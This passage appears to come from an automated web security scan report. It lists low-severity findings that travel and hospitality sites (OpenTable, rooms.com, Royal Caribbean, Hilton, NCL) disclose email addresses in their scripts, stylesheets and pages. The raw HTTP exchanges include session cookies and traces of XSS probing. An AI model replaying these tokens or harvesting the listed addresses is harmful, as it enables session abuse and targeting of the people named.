Cookie: s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; s_cc=true; s_nr=1317646509630-New; s_sq=%5B%5BB%5D%5D; lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; restrefwhite=200; ftc=x=10%2f03%2f2011+15%3a54%3a50&p1q=rid%3d200%26rid%3d200%26restref%3d200&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=153&p1=117&rr1=200&rr2=200; lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=1&st=5; jslt=DhNUH7QEwV3Jv9lH5b7HaYn50h4yr3sP; pgseq=

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 10005
Content-Type: text/css
Last-Modified: Fri, 23 Sep 2011 02:15:18 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-03
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:22-0800" exp "2009.12.01T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:55:04 GMT

...body{background-color:#fff;font-family:Verdana,Arial,sans-serif;text-align:center;margin:0;background-position:center;}.divider{color:#666;float:left;clear:both;background-color:#666;width:978px;he
...[SNIP]...
20.258. http://www.opentable.com/styles/wick002.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /styles/wick002.css

Issue detail

The following email address was disclosed in the response:

Request

GET /styles/wick002.css?v=Web_11_10_0_11.prod.com HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 628
Content-Type: text/css
Last-Modified: Fri, 23 Sep 2011 02:15:14 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:57:53 GMT

.wickWrapper{position:relative;float:left;z-index:1;}.floaterDiv{position:absolute;z-index:100;top:0;left:0;display:none;padding:0;margin:22px 0 0 0;}.floater td{font-family:Verdana,Arial,sans-serif;b
...[SNIP]...
20.259. http://www.opentable.com/styles/wick003.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /styles/wick003.css

Issue detail

The following email address was disclosed in the response:

Request

GET /styles/wick003.css?v=Web_11_10_0_11.prod.com HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.opentable.com/opentables.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; s_cc=true; s_nr=1317646509630-New; s_sq=%5B%5BB%5D%5D; restrefwhite=90; ftc=x=10%2f03%2f2011+15%3a54%3a50&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153; lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=1&st=5; pgseq=

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 753
Content-Type: text/css
Last-Modified: Fri, 23 Sep 2011 02:15:14 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:54:51 GMT

.floater{position:absolute;z-index:100!important;top:81px!important;left:15px!important;display:none;padding:2px;border:1px solid #a49e95;background:#fff;-moz-border-radius:.4em;-webkit-border-radius:
...[SNIP]...
20.260. http://www.rooms.com/lib/Javascript/general/ComboWidgetHomePage.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rooms.com
Path:   /lib/Javascript/general/ComboWidgetHomePage.js

Issue detail

The following email address was disclosed in the response:

Request

GET /lib/Javascript/general/ComboWidgetHomePage.js HTTP/1.1
Host: www.rooms.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.rooms.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WDVID=%7B1B9F7B9F%2D1F10%2D4DD2%2DB809%2DCD55B60D376A%7D; WDUID=%7BBF289CFB%2DB6F0%2D4E0A%2DA974%2DB1F61E804CC5%7D; ASPSESSIONIDACSASCSR=NALAJOMALKFNOGAMNPMOOCBP; NSC_WJQ-XXX.SPPNT.DPN=ffffffff095b1c4a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Cteonnt-Length: 3152
Content-Type: application/x-javascript
Last-Modified: Wed, 26 Jan 2011 10:41:51 GMT
Accept-Ranges: bytes
ETag: "f5cd2ca445bdcb1:5853"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP CURa ADMa DEVa TAIa CONo HISa OUR BUS IND PHY ONL UNI PUR COM NAV INT DEM STA"
X-Powered-By: ASP.NET
Date: Mon, 03 Oct 2011 12:41:55 GMT
Content-Length: 3152

/*
' $Header: /WebSites/library/javascript/general/ComboWidgetHomePage.js 1 12/22/10 5:33p Sampsonm $
' $Workfile: ComboWidgetHomePage.js $
' $Author: Sampsonm $
' $Date: 12/22/10 5:33
...[SNIP]...
field.");
           document.EmailForm.email.focus();
return false;
       }else if (!ValidEmail(document.EmailForm.email)){
           alert ("Please enter a Valid Email Address.\r(e.g., yourname@provider.com)")
           document.EmailForm.email.select();        
return false;
}else if (document.EmailForm.zip.value == ""){
           alert ("Your zip code is a required field.")
           
...[SNIP]...
20.261. http://www.rooms.com/lib/Javascript/general/msgbox.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rooms.com
Path:   /lib/Javascript/general/msgbox.js

Issue detail

The following email address was disclosed in the response:

Request

GET /lib/Javascript/general/msgbox.js HTTP/1.1
Host: www.rooms.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.rooms.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WDVID=%7B1B9F7B9F%2D1F10%2D4DD2%2DB809%2DCD55B60D376A%7D; WDUID=%7BBF289CFB%2DB6F0%2D4E0A%2DA974%2DB1F61E804CC5%7D; ASPSESSIONIDACSASCSR=NALAJOMALKFNOGAMNPMOOCBP; NSC_WJQ-XXX.SPPNT.DPN=ffffffff095b1c4a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Cteonnt-Length: 12104
Content-Type: application/x-javascript
Last-Modified: Mon, 10 Sep 2007 17:51:46 GMT
Accept-Ranges: bytes
ETag: "f131a141d3f3c71:5853"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP CURa ADMa DEVa TAIa CONo HISa OUR BUS IND PHY ONL UNI PUR COM NAV INT DEM STA"
X-Powered-By: ASP.NET
Date: Mon, 03 Oct 2011 12:41:56 GMT
Content-Length: 12104

//-----------------------------------------------------------------------------------------|
//-----------------------------------------------------------------------------------------|
// $Header: /WebSites/library/javascript/general/msgbox.js 13 8/24/07 12:59p Bpena $
//
// AUTHOR: Jeff Kody (kodyj@nlg.com)
// CREATED: 7/20/2005
// MODIFICATION HISTORY:
// PURPOSE: this file contains objects and static methods for displaying
//                            dynamic inline message windows. I
...[SNIP]...
20.262. http://www.rooms.com/lib/Javascript/validation/messagingobjects.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rooms.com
Path:   /lib/Javascript/validation/messagingobjects.js

Issue detail

The following email address was disclosed in the response:

Request

GET /lib/Javascript/validation/messagingobjects.js HTTP/1.1
Host: www.rooms.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.rooms.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WDVID=%7B1B9F7B9F%2D1F10%2D4DD2%2DB809%2DCD55B60D376A%7D; WDUID=%7BBF289CFB%2DB6F0%2D4E0A%2DA974%2DB1F61E804CC5%7D; ASPSESSIONIDACSASCSR=NALAJOMALKFNOGAMNPMOOCBP; NSC_WJQ-XXX.SPPNT.DPN=ffffffff095b1c4a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Cteonnt-Length: 16882
Content-Type: application/x-javascript
Last-Modified: Thu, 29 May 2008 12:45:00 GMT
Accept-Ranges: bytes
ETag: "40edcf89c1c81:5853"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP CURa ADMa DEVa TAIa CONo HISa OUR BUS IND PHY ONL UNI PUR COM NAV INT DEM STA"
X-Powered-By: ASP.NET
Date: Mon, 03 Oct 2011 12:41:55 GMT
Content-Length: 16882

//-----------------------------------------------------------------------------------------|
//-----------------------------------------------------------------------------------------|
// AUTHOR: Jeff Kody (kodyj@nlg.com)
// CREATED: 10/14/2003
// MODIFICATION HISTORY:
// PURPOSE: this file contains a set of validation objects
// and a message buffer.
//-
...[SNIP]...
20.263. http://www.rooms.com/lib/javascript/general/validation.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rooms.com
Path:   /lib/javascript/general/validation.js

Issue detail

The following email address was disclosed in the response:

Request

GET /lib/javascript/general/validation.js HTTP/1.1
Host: www.rooms.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.rooms.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WDVID=%7B1B9F7B9F%2D1F10%2D4DD2%2DB809%2DCD55B60D376A%7D; WDUID=%7BBF289CFB%2DB6F0%2D4E0A%2DA974%2DB1F61E804CC5%7D; ASPSESSIONIDACSASCSR=NALAJOMALKFNOGAMNPMOOCBP; NSC_WJQ-XXX.SPPNT.DPN=ffffffff095b1c4a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Cteonnt-Length: 2695
Content-Type: application/x-javascript
Last-Modified: Thu, 28 Apr 2011 09:32:29 GMT
Accept-Ranges: bytes
ETag: "5ac03631875cc1:5853"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP CURa ADMa DEVa TAIa CONo HISa OUR BUS IND PHY ONL UNI PUR COM NAV INT DEM STA"
X-Powered-By: ASP.NET
Date: Mon, 03 Oct 2011 12:41:54 GMT
Content-Length: 2695


// Description : General javascript validation functions.
// File            : validation.js
// Created By    : Sanjeev Joshi(joshis@NLG.com)
// Created Date : 06/12/03


// The possible options for the zip to be invalid are
// 00000 or -ve number (parseFloat(vZip)<=0)
// // "." in the Zip entered ((vZip.indexOf('.') !== -1) )
// Al
...[SNIP]...
20.264. http://www.rooms.com/lib/javascript/validation/validating.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rooms.com
Path:   /lib/javascript/validation/validating.js

Issue detail

The following email address was disclosed in the response:

Request

GET /lib/javascript/validation/validating.js HTTP/1.1
Host: www.rooms.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.rooms.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WDVID=%7B1B9F7B9F%2D1F10%2D4DD2%2DB809%2DCD55B60D376A%7D; WDUID=%7BBF289CFB%2DB6F0%2D4E0A%2DA974%2DB1F61E804CC5%7D; ASPSESSIONIDACSASCSR=NALAJOMALKFNOGAMNPMOOCBP; NSC_WJQ-XXX.SPPNT.DPN=ffffffff095b1c4a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Cteonnt-Length: 6847
Content-Type: application/x-javascript
Last-Modified: Mon, 07 Feb 2011 22:19:04 GMT
Accept-Ranges: bytes
ETag: "1b8747715c7cb1:5853"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP CURa ADMa DEVa TAIa CONo HISa OUR BUS IND PHY ONL UNI PUR COM NAV INT DEM STA"
X-Powered-By: ASP.NET
Date: Mon, 03 Oct 2011 12:41:57 GMT
Content-Length: 6847

// validates email sign up form
// $Header: /WebSites/library/javascript/validation/validating.js 4 1/25/11 2:21p Mccusker $

function validating(){
   if ((document.EmailForm.firstname.
...[SNIP]...
eld.");
           document.EmailForm.email.focus();
return false;
       }else if (!validateEmail(document.EmailForm.email)){
           alert ("Please enter a Valid Email Address.\r(e.g., yourname@provider.com)")
           document.EmailForm.email.select();        
return false;
}else if (document.EmailForm.zip.value == ""){
           alert ("Your zip code is a required field.")
           
...[SNIP]...
eld.");
           document.EmailForm.email.focus();
return false;
       }else if (!validateEmail(document.EmailForm.email)){
           alert ("Please enter a Valid Email Address.\r(e.g., yourname@provider.com)")
           document.EmailForm.email.select();        
return false;
}else if (document.EmailForm.zip.value == ""){
           alert ("Your zip code is a required field.")
           
...[SNIP]...
eld.");
           document.EmailForm.email.focus();
return false;
       }else if (!validateEmail(document.EmailForm.email)){
           alert ("Please enter a Valid Email Address.\r(e.g., yourname@provider.com)")
           document.EmailForm.email.select();        
return false;
}else if (document.EmailForm.zip.value == ""){
           alert ("Your zip code is a required field.")
           
...[SNIP]...
eld.");
           document.EmailForm.email.focus();
return false;
       }else if (!validateEmail(document.EmailForm.email)){
           alert ("Please enter a Valid Email Address.\r(e.g., yourname@provider.com)")
           document.EmailForm.email.select();        
return false;
}else if (document.EmailForm.zip.value == ""){
           alert ("Your zip code is a required field.")
           
...[SNIP]...
20.265. http://www.royalcaribbean.com/css/no_hp_screen.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.royalcaribbean.com
Path:   /css/no_hp_screen.css

Issue detail

The following email address was disclosed in the response:

Request

GET /css/no_hp_screen.css HTTP/1.1
Host: www.royalcaribbean.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.royalcaribbean.com/beforeyouboard/home.do?cS=NAVBAR
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000Hnty0rieXZnxmfuPhXDAbub:12h3g0fq2; wuc=USA; MSIE_ALERT=true; s_cc=true; s_sq=royalcaribbeanprod%3D%2526pid%253DRCI%25253Ahome%25253Ahomepagenobookingus%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.royalcaribbean.com%25252Fbeforeyouboard%25252Fhome.do%25253FcS%25253DNAVBAR%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Tue, 21 Dec 2010 03:50:08 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 9142
Content-Type: text/css
Cache-Control: max-age=122816
Expires: Tue, 04 Oct 2011 22:48:08 GMT
Date: Mon, 03 Oct 2011 12:41:12 GMT
Connection: close

/* @override
   http://new_royal/css/screen.css
   http://royal.micstura-hosting.com/css/screen.css
   http://new_royal/css/screen.css
   http://royal_final/css/screen.css
*/

/* --------------------------------------------------------------

Title:        Master styles for screen media

Author:        Fabian Socarras - fsocarras@micstura.com
Client:        Royal Caribbean International
Project:        Royal Caribbean Home Page Redesign
Date:        Tuesday; September 8, 2009

Version:        1.0

---------------------------------------------------
...[SNIP]...
20.266. http://www.royalcaribbean.com/js/jquery.colorbox.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.royalcaribbean.com
Path:   /js/jquery.colorbox.js

Issue detail

The following email address was disclosed in the response:

Request

GET /js/jquery.colorbox.js HTTP/1.1
Host: www.royalcaribbean.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.royalcaribbean.com/search/processSearch.do?ip_server=prdiphrase-unstruct-new222.dmz.rccl.com%3A200&ip_text=xss
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000Hnty0rieXZnxmfuPhXDAbub:12h3g0fq2; wuc=USA; MSIE_ALERT=true; s_cc=true; s_sq=royalcaribbeanprod%3D%2526pid%253DRCI%25253Abeforeyouboard%25253Ahome%25253Abeforeyouboard%2526pidt%253D1%2526oid%253D%25250A%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%25250A%252509%252509%252509%252509%252509%252509%252509%252509%252509%2526oidt%253D3%2526ot%253DSUBMIT

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Tue, 21 Dec 2010 03:50:05 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 23267
Content-Type: application/x-javascript
Cache-Control: max-age=122762
Expires: Tue, 04 Oct 2011 22:48:08 GMT
Date: Mon, 03 Oct 2011 12:42:06 GMT
Connection: close

// ColorBox v1.3.9 - a full featured, light-weight, customizable lightbox based on jQuery 1.3
// c) 2009 Jack Moore - www.colorpowered.com - jack@colorpowered.com
// Licensed under the MIT license: http://www.opensource.org/licenses/mit-license.php
(function ($, window) {
   
   var
   // ColorBox Default Settings.    
   // See http://colorpowered.com/colorbox for detail
...[SNIP]...
20.267. http://www1.hilton.com/common/js/jquery/jquery-autocomplete.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.hilton.com
Path:   /common/js/jquery/jquery-autocomplete.js

Issue detail

The following email addresses were disclosed in the response:

Request

GET /common/js/jquery/jquery-autocomplete.js?ver=rel-r1 HTTP/1.1
Host: www1.hilton.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www1.hilton.com/en_US/hi/index.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=4E9B21AE664381D1B53DE8378483FB39.etc13; cross-sell=hi; NSC_qse-qgt=44153d5f3660

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Fri, 09 Sep 2011 19:01:51 GMT
ETag: "1a1b-cf56a5c0"
Accept-Ranges: bytes
Content-Length: 6683
Content-Type: application/x-javascript
Cache-Control: max-age=60240
Expires: Tue, 04 Oct 2011 05:36:41 GMT
Date: Mon, 03 Oct 2011 12:52:41 GMT
Connection: close


/* jQuery Autocomplete
* Version 1.0
* Written by Yehuda Katz (wycats@gmail.com) and Rein Henrichs (reinh@reinh.com)
* @requires jQuery v1.2, jQuery dimensions plugin
*
* Copyright 2007 Yehuda Katz, Rein Henrichs
* Dual licensed under the MIT and GPL licenses:
* http://www.opensource.org/licenses/mit-license
...[SNIP]...
20.268. http://www1.hilton.com/common/js/jquery/jquery-dimensions.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.hilton.com
Path:   /common/js/jquery/jquery-dimensions.js

Issue detail

The following email addresses were disclosed in the response:

Request

GET /common/js/jquery/jquery-dimensions.js?ver=rel-r1 HTTP/1.1
Host: www1.hilton.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www1.hilton.com/en_US/hi/index.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=4E9B21AE664381D1B53DE8378483FB39.etc13; cross-sell=hi; NSC_qse-qgt=44153d5f3660

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Fri, 09 Sep 2011 19:01:54 GMT
ETag: "e59-cf846c80"
Accept-Ranges: bytes
Content-Length: 3673
Content-Type: application/x-javascript
Cache-Control: max-age=59993
Expires: Tue, 04 Oct 2011 05:32:34 GMT
Date: Mon, 03 Oct 2011 12:52:41 GMT
Connection: close


/* Copyright (c) 2007 Paul Bakaus (paul.bakaus@googlemail.com) and Brandon Aaron (brandon.aaron@gmail.com || http://brandonaaron.net)
* Dual licensed under the MIT (http://www.opensource.org/licenses/mit-license.php)
* and GPL (http://www.opensource.org/licenses/gpl-license.php) licenses.
*
* $LastCha
...[SNIP]...
20.269. http://www1.hilton.com/common/js/jquery/jquery.bgiframe.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.hilton.com
Path:   /common/js/jquery/jquery.bgiframe.js

Issue detail

The following email address was disclosed in the response:

Request

GET /common/js/jquery/jquery.bgiframe.js?ver=rel-r1 HTTP/1.1
Host: www1.hilton.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www1.hilton.com/en_US/hi/index.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=4E9B21AE664381D1B53DE8378483FB39.etc13; cross-sell=hi; NSC_qse-qgt=44153d5f3660

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Fri, 09 Sep 2011 19:01:51 GMT
ETag: "13b5-cf56a5c0"
Accept-Ranges: bytes
Content-Length: 5045
Content-Type: application/x-javascript
Cache-Control: max-age=60574
Expires: Tue, 04 Oct 2011 05:42:15 GMT
Date: Mon, 03 Oct 2011 12:52:41 GMT
Connection: close

/* Copyright (c) 2006 Brandon Aaron (http://brandonaaron.net)
* Dual licensed under the MIT (http://www.opensource.org/licenses/mit-license.php)
* and GPL (http://www.opensource.org/licenses/gpl-li
...[SNIP]...
ided so that one could change
*        the src of the iframe to whatever they need.
*        Default: "javascript:false;"
*
* @name bgiframe
* @type jQuery
* @cat Plugins/bgiframe
* @author Brandon Aaron (brandon.aaron@gmail.com || http://brandonaaron.net)
*/
$.fn.bgIframe = $.fn.bgiframe = function(s) {
   // This is only for IE6
   if ( $.browser.msie && parseInt($.browser.version) <= 6 ) {
       s = $.extend({
           top : 'auto'
...[SNIP]...
20.270. http://www1.hilton.com/en_US/hi/customersupport/index.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.hilton.com
Path:   /en_US/hi/customersupport/index.do

Issue detail

The following email address was disclosed in the response:

Request

GET /en_US/hi/customersupport/index.do HTTP/1.1
Host: www1.hilton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Mon, 03 Oct 2011 13:05:00 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_qse-qgt=44153d5f3660;expires=Mon, 03-Oct-11 13:16:00 GMT;path=/
Content-Length: 35005


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
   <head>
       

<meta name=
...[SNIP]...
<a href="mailto:Guest_Assistance@hilton.com">
...[SNIP]...
20.271. http://www1.hilton.com/en_US/hi/customersupport/site-usage.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.hilton.com
Path:   /en_US/hi/customersupport/site-usage.do

Issue detail

The following email address was disclosed in the response:

Request

GET /en_US/hi/customersupport/site-usage.do HTTP/1.1
Host: www1.hilton.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www1.hilton.com/en_US/hi/index.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BetaCookie=Y; JSESSIONID=4E9B21AE664381D1B53DE8378483FB39.etc13; ClrOSSID=1317646383790-9086; ClrSCD=1317646383790; K3R7=0; GWSESSIONID=QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623; cross-sell=hi; ClrCSTO=T; mmcore.tst=0.798; mmid=688320496%7CCQAAAAodekFwyAYAAA%3D%3D; mmcore.pd=688320496%7CCQAAAAodekFwyAYAAA%3D%3D; mmcore.srv=cg1.usw; ClrSSID=1317646383790-9086; NSC_qse-qgt=44153d5f3660; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317635903346:ss=1317635584777

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Content-Length: 69511
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 12:58:07 GMT
Connection: close
Set-Cookie: NSC_qse-qgt=44153d5f3660;expires=Mon, 03-Oct-11 13:09:07 GMT;path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
   <head>
       

<meta name=
...[SNIP]...
<a href="mailto:CopyrightClaim@hilton.com">CopyrightClaim@hilton.com</a>
...[SNIP]...
20.272. http://www2.ncl.com/about/contact-us  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /about/contact-us

Issue detail

The following email addresses were disclosed in the response:

Request

GET /about/contact-us HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Drupal-Cache: HIT
ETag: "1317631645-1"
Last-Modified: Mon, 03 Oct 2011 08:47:25 +0000
X-Ncl-SLog: 10.5.44.30
Content-Type: text/html; charset=utf-8
Cache-Control: public, max-age=14400
Date: Mon, 03 Oct 2011 13:05:32 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:05:32 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:05:32 GMT; path=/; domain=ncl.com
Content-Length: 67525

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html lang="en" class="ie ie6"> <![endif]-->
